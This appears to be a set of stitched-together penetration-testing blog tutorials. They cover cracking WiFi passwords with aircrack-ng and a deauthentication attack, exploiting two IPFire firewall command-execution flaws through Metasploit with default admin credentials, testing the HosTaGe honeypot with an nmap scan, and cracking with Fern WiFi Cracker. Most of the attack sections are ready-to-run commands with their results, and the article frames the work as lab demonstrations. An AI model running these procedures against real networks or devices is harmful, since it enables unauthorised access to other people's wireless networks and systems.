Crack Wifi Password using Aircrack-ng

This is the classical method of wireless password cracking .All the tools use this method in one way or other.

First start the monitor mode which will listen to all the wifi connections nearby with command:

airmon-ng start wlan0

In your lower right corner you will see written. monitor mode enabled for [phy1]wlan0mon

Now run the following command to confirm that our wifi adaptor is in monitor mode , so run command:

ifconfig

which will show you the wifi adaptor as wlan0mon meaning adaptor is in monitor mode.

Now run command:

airodump-ng wlan0mon

The above command will start listening to all the available wifi connections.

Now when your target appeas hit ctrl^c and then to capture the handshake type command:

airodump-ng -c 7 --bssid C8:3A:35:44:FD:F0  --write 1 wlan0mon

Here,

 -c is the channel no. of the AP which will be listed in CH column in the output of above command as in my case it is 7.

--bssid is the MAC address of the target AP as in my case it is rajlab and bssid is  C8:3A:35:44:FD:F0

--write is the capture file in which the capture packets will be saved as in my case i have named it as 1 . 

Option	Description
-c	The channel for the wireless network
--bssid	The MAC address of the access point
-w	The file name prefix for the file which will contain authentication handshake
mon0	The wireless interface

Now start the deauth attack  to disconnect all the connected clients to that AP which will help in capturing the handshake with command:

aireplay-ng -0 100 –a C8:XX:35:XX:F0  -e rajlab wlan0mon

Here,

-0 is used for deauth attack

100 is no. of deauth packets to be sent

-a is the target AP MAC address

-e is ESSID of the target AP i.e. name of the target AP 

After launching the deauth attack we will get the WPA handshake in the previous terminal window in the top right corner then hit ctrl^c.

Now we have to crack the password with aircrack-ng so type command :

aircrack-ng 1-01.cap –w /usr/share/nmap/nselib/data/passwords.lst

Here,

1-01.cap is the capture file we generated in the airodump-ng .

-w is the dictionary to be used to perform dictionary attack

In my case the key is found as KEY FOUND! [raj123987]

Exploit Linux PC using IPFire Bash Environment Variable Injection (Shellshock)

IPFire, a free linux based open source firewall distribution, version <= 2.15 Update Core 82 contains an authenticated remote command execution vulnerability via shellshock in the request header

Exploit Targets

Ip Fire 2.15

Requirement

Attacker: kali Linux

Victim PC: Linux

Open Kali terminal type msfconsole

Now type use exploit/linux/http/ipfire_bashbug_exec

msf exploit (ipfire_bashbug_exec)>set rhost 192.168.0.176

msf exploit (ipfire_bashbug_exec)>set username admin

msf exploit (ipfire_bashbug_exec)>set password admin

msf exploit (ipfire_bashbug_exec)>set payload cmd/unix/generic

msf exploit (ipfire_bashbug_exec)>set cmd uname -a

msf exploit (ipfire_bashbug_exec)>exploit          

Exploitation in Linux Firewall using IPFire proxy.cgi RCE

IPFire, a free linux based open source firewall distribution, version < 2.19 Update Core 101 contains remote command execution vulnerability in the proxy.cgi page.

Exploit Targets

Ipfire 2.19

Requirement

Attacker: kali Linux

Victim PC: linux

Open Kali terminal type msfconsole

Now type use exploit/linux/http/ipfire_proxy_exec

msf exploit (ipfire_proxy_exec)>set rhost 192.168.0.169 (IP of Remote Host)

msf exploit (ipfire_proxy_exec)>set rport 444

msf exploit (ipfire_proxy_exec)>set password admin

msf exploit (ipfire_proxy_exec)>exploit

Detect Hacker in Network using Android Phone

HosTaGe is a mobile honeypot that detects attacks on wireless networks.

First of all search for HosTaGe honeypot on android play store.

Now click on the above shown app and install it.

Now for testing i will start nmap version scan of the android from my system with command :

Nmap –sV 192.168.0.107

Here 192.168.0.107 is my target ip.

As  you can see various fake services are started as shown in nmap results.

As the nmap  scanning is started the android icon will turn red and an alarm will be started.

Cracking Wifi Password using Fern WIFi Cracker

Fern is a python based Wi-Fi cracker tool used for security auditing purposes. The program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks. The tool is available both as open source and a premium model of the free version. In this article we’ll be demonstrating a WPA dictionary attack using the open source version. You can check the link to download it here.

First step is to launch the tool. If you have installed all of the requirements mentioned, you’ll be able to see the following screen.

 

Now, here in the first option, the user can select the wireless interface from the drop down menu. Here, we have selected the Wlan0 interface. As you can see that fern here has automatically put the Wlan0 interface on monitor mode.

 

Monitor Mode: NIC cards by default are designed to only capture packets that are destined to be reached to a specific device. Monitor mode is essentially a promiscuous mode for wireless networks that allows Wi-Fi adapters to capture Wi-Fi management, data and control packets without having to associate with that access point first. Hence, by definition we can understand that raw pcap files can be captured by a wireless adapter in monitor mode and can be used for auditing and/or hacking purposes.

 

Once we have chosen the interface, we’ll need to scan for access points now.

 

Here, observe that we have scanned a total of 18 access points.

 

 

Access Point: It is a device that sends out wireless signals. Essentially the internet connection from a router runs down to an access point and allows users to access the internet using IEEE 802.11 protocol (commonly known as Wi-Fi). In our day to day usage scenario, we have a Wi-Fi router set up at home which also serves as a wireless access point.

 

SSID: Service Set IDentifier is the name given to an access point for simplicity.

 

Launching the attack: Now we can click on the discovered access point, choose a dictionary file and click on launch attack with our chosen dictionary. It is that simple! As you can see that we have a matched credential and received the SSID password down below.

 

Please note that this program is only able to crack WPA/WEP/WPS keys only. For tools that work on stronger encryption like WPA2 please refer to the latest article on wireless penetration testing on Hacking Articles. Thanks for reading.